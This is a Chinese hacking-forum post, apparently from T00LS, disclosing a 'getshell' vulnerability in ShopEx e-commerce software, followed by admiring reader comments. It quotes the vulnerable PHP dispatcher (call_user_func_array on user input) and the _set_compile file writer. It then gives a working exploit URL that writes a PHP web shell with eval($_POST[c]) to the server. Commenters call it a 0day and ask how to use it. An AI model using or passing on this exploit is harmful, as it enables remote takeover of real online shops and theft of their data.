【我爱T00LS】shopex Getshell
ctl.product.php
class ctl_product extends shopPage{
var $_call = 'call';
var $type = 'goods';
var $seoTag = array('shopname','brand','goods_name','goods_cat','goods_intro','goods_brief','brand_kw','goods_kw','goods_price','update_time','goods_bn');
function ctl_product(){
parent::shopPage();
$this->title = $this->system->getConf('site.goods_title');
$this->keywords = $this->system->getConf('site.goods_meta_key_words');
$this->desc = $this->system->getConf('site.goods_meta_desc');
}
function call(){
$args = func_get_args();
$action = array_shift($args);
//echo $args."||".var_dump($this);
//echo 1111;
var_dump($args);
var_dump(get_class_methods($this));
if(method_exists($this,$action)){
return call_user_func_array(array(&$this,$action),$args);//可以执行一些 系统自带的函数 我们找下有没可利用的
}
pageFactory.php
public function _set_compile( $key, &$content )//就调用这个函数 可以直接写出shell
{
if ( !$this->force_compile )
{
file_put_contents( $this->compile_dir.$key.".php", $content );
}
}[url]http://xx.com/product-12-[/url]<script%20language="php">eval($_POST[c])%3B-_set_compile.html
已经提交官方了 估计已经修复了
关于作者
评论55次
这个给力 哈哈
只能膜拜啦~~~~
请问各位大神,122322.php这个文件是怎么生成的呢?
call_user_func_array的时候应该要检查一下参数的
谢谢分享原创
牛逼 学xi啦
给力小子。。。
楼主威武啊,
最近撸主大手笔大制作啊
测试低版本的好像不行,无效模式调用
楼主喝醉了吧,发这么多0DAY,别醒过来后,哭抽了啊。
昨天快下班一看,这么多,好给力
这是什么节奏啊
最近出了很多0day呢!
LZ给力!!!!
牛B啊!!!
估计楼主准备跑路、、、
shopex最新版注入出的密码是怎么解密的?
黑客 你好,黑客 再见。
怎么利用呢 需要登录后台吗